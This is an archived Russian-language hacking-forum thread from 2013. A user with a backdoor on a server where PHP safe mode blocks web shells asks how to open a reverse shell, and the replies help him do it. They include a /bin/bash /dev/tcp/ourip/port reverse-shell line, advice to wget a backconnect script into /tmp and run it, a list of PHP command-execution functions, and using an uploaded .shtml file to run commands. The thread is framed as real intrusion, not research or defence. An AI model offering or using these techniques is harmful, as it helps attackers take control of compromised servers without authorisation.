ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
25.01.2013, 01:47
|
|
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
Провел на форуме:
290351
Репутация:
173
|
|
На сервере не работает ни 1 шел, сейф мод включен
Вопрос:
Как через бекдор, сделать бекконект, не имея шела?
Пытался залить скрипт бэкконекта, и запустить командой
Сообщение от None
?cmd=system('perl dc.pl 127.0.0.1 8080');
Но увы не получилось, какие ещё есть способы? |
|
|
25.01.2013, 09:10
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от OxoTnik
На сервере не работает ни 1 шел, сейф мод включен
Вопрос:
Как через бекдор, сделать бекконект, не имея шела?
Пытался залить скрипт бэкконекта, и запустить командой
Но увы не получилось, какие ещё есть способы?
Залей через wget бэкконект в /tmp, переместись из текущего каталога в папку /tmp: cd /tmp, дай права на выполнение и запускай.
P.S. возможно не работает команда system, попробуй другие.
|
|
|
|
25.01.2013, 15:11
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от OxoTnik
Вот я и спрашиваю какие другие есть, есть пример ?
passthru, system, exec, shell_exec
|
|
|
|
25.01.2013, 20:51
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Покури вот в этом ключе:
/bin/bash /dev/tcp/ourip/port
|
|
|
|
25.01.2013, 21:08
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от Cennarios
Покури вот в этом ключе:
/bin/bash /dev/tcp/ourip/port
Скорее всего у него отключены функции для выполнения системных команд
|
|
|
|
25.01.2013, 22:27
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
А они вовсе не обязательны. Судя по всему есть возможность аплоадить файлы, но вследствие жестких ограничений на php, стандартные шелы не работают. Можно попробовать залить .shtml файл вида и в его контексте выполнить вышеуказанную схему. Правда там надо немного покопать гугл, есть нюансы при провешивании обратного соединения таким образом.
|
|
|
|
25.01.2013, 22:43
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458
Репутация:
3965
|
|
shtml шелл
еще команды, позволяющие выполнить команду - proc_open, popen
__________________
BlackHat. MoDL
|
|
|
|
26.01.2013, 11:11
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Сообщение от OxoTnik
Пробовал, реакций нету...
Аналогично, 0
Тогда зиливай перловский скрипт на backconnect и через него додалбливай.
|
|
|
|
26.01.2013, 14:20
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458
Репутация:
3965
|
|
выведи значение disable_functions
__________________
BlackHat. MoDL
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
